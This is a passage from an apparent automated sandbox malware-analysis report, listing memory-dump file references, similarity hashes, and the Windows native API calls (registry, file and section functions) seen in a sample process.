              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: 1a4e93b5b0c34413be6a60e31f26225a6f1692f2e93fb9adff9c34a72b48f40f
              • Instruction ID: f57a8e89a2936b58c38755d82ac0d906326e705df1fba8c407d04e264d6259d8
              • Opcode Fuzzy Hash: 1a4e93b5b0c34413be6a60e31f26225a6f1692f2e93fb9adff9c34a72b48f40f
              • Instruction Fuzzy Hash: 7FF098B6101258BFE7119B86DC88DEB7B6CEBC97A5B448019F61987251D270AD41C7B0
              APIs
              • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 00A19948
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: CreateSection
              • String ID:
              • API String ID: 2449625523-0
              • Opcode ID: d020321162eefaabde99366bfbfc0063534e84b19678e272edf7e89630f9cee6
              • Instruction ID: b2320748914a259c569af9a8df26523115be521ba6f8fa21721cd0ec1a9e2b93
              • Opcode Fuzzy Hash: d020321162eefaabde99366bfbfc0063534e84b19678e272edf7e89630f9cee6
              • Instruction Fuzzy Hash: E1F0ACB6104258BFAB10DED6DC88DF77B6DEB8A7A5F404119F60997211C270AD51C7B0
              APIs
              • NtEnumerateValueKey.NTDLL(?,?,?,?,?,?), ref: 00A19268
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: EnumerateValue
              • String ID:
              • API String ID: 1749906896-0
              • Opcode ID: 382e18be24707e68ac730e499587141a38fee5f9db8d1c421bb61587528f4c04
              • Instruction ID: 86e024787e89d1cd5bf6e1d9b5fa2a17ae103355207d7c506680ff96f782a764
              • Opcode Fuzzy Hash: 382e18be24707e68ac730e499587141a38fee5f9db8d1c421bb61587528f4c04
              • Instruction Fuzzy Hash: A4E0E5B2205158BFB7109BDADC88EFB7F6DDBDA7A5F004019FA1887101C270AC50C6B0
              APIs
              • NtQueryValueKey.NTDLL(?,?,?,?,?,?), ref: 00A192DC
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: abb20c14e87dd8c7fec63fe2d5df0233fb452730ff76eaa2577e7eab252d0cc6
              • Instruction ID: 98fb41679ab64529e64b8e9700d7a56e1adddac10b7cdce966e08a9b0d529b36
              • Opcode Fuzzy Hash: abb20c14e87dd8c7fec63fe2d5df0233fb452730ff76eaa2577e7eab252d0cc6
              • Instruction Fuzzy Hash: D7E0E5B6504258BFA7108BC6DC88EFB7F6CEBCA7A5B144019BA0987100C270AC81C6B0
              APIs
              • NtEnumerateKey.NTDLL(?,?,?,?,?,?), ref: 00A19364
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Enumerate
              • String ID:
              • API String ID: 304946047-0
              • Opcode ID: 4ab13405e67f352c57cf56decbffd344250c024040bf82f39b3eb6605c127cdb
              • Instruction ID: 8ca59effd8e7258c8e694c6297993dde9d8228ca547fc56f7404d2f6c3ec860a
              • Opcode Fuzzy Hash: 4ab13405e67f352c57cf56decbffd344250c024040bf82f39b3eb6605c127cdb
              • Instruction Fuzzy Hash: 4DE01AB6504158BFA7208BC6DC9CDFBBF6DEBCA7A5B048019FA198B140C270AD41C7B0
              APIs
              • NtSetValueKey.NTDLL(?,?,?,?,?,?), ref: 00A193A4
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Value
              • String ID:
              • API String ID: 3702945584-0
              • Opcode ID: 64f0c1f286ebdbbdeacfe81b6b6a7049f31d67a57aea91c24fd52557528bc742
              • Instruction ID: 1cfc3cd85e0aaae7810d749bfec7401c95b87678f562c4fe0d6c257845a6cf22
              • Opcode Fuzzy Hash: 64f0c1f286ebdbbdeacfe81b6b6a7049f31d67a57aea91c24fd52557528bc742
              • Instruction Fuzzy Hash: A4E01AB6104158BFA7108BD6DC8CEFBBF2CDBCA7A5B04801AFA1A87141C271AC41C7B0
              APIs
              • NtQueryMultipleValueKey.NTDLL(?,?,?,?,?,?), ref: 00A194D4
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: MultipleQueryValue
              • String ID:
              • API String ID: 23559346-0
              • Opcode ID: 6e8b2fdaf391f3b7464217b86bf4218005eda3b3fa57221291283d5d3f595710
              • Instruction ID: 44c8fa446ff801da92aa916d91779f897791b2cea8daa69ddd8245180295eb9e
              • Opcode Fuzzy Hash: 6e8b2fdaf391f3b7464217b86bf4218005eda3b3fa57221291283d5d3f595710
              • Instruction Fuzzy Hash: 4FE0E5B6101158BFA7109B96DC88DFBBF6DDBCA7A5B048019FA0987100C270AC42C6B0
              APIs
              • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 00A19ACC
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: FileOpen
              • String ID:
              • API String ID: 2669468079-0
              • Opcode ID: 8199cd419e0686a52599c183d62a0ada75866b49f2e75f1df26889b33abf6676
              • Instruction ID: 1dcbe0e063a5def04dbf71942e4b53caf1fd4e0346999a5076a94f20ba9ba7fb
              • Opcode Fuzzy Hash: 8199cd419e0686a52599c183d62a0ada75866b49f2e75f1df26889b33abf6676
              • Instruction Fuzzy Hash: 12E0E5B2504258BFA7108B86DC88EFB7F6CEBCA7E4B04451DBA0887100C270AD51C6B4
              APIs
              • NtQuerySecurityObject.NTDLL(?,?,?,?,?), ref: 00A190CB
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: ObjectQuerySecurity
              • String ID:
              • API String ID: 718582247-0
              • Opcode ID: 9eaec6e00d207816ec32feef6f57fe80c20b126059e9f46641911ceb5d88a3c2
              • Instruction ID: 499ace4c6297bd5002dc3d6f2988d3ec4f216c9c1c7dc685ac6e386e5aaad72d
              • Opcode Fuzzy Hash: 9eaec6e00d207816ec32feef6f57fe80c20b126059e9f46641911ceb5d88a3c2
              • Instruction Fuzzy Hash: 8FE0ECA1500154BEA734A7DB9C0DDF77FACDBD67B0B444119B50DD3110E660AC45CAB0
              APIs
              • NtSetVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 00A19077
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
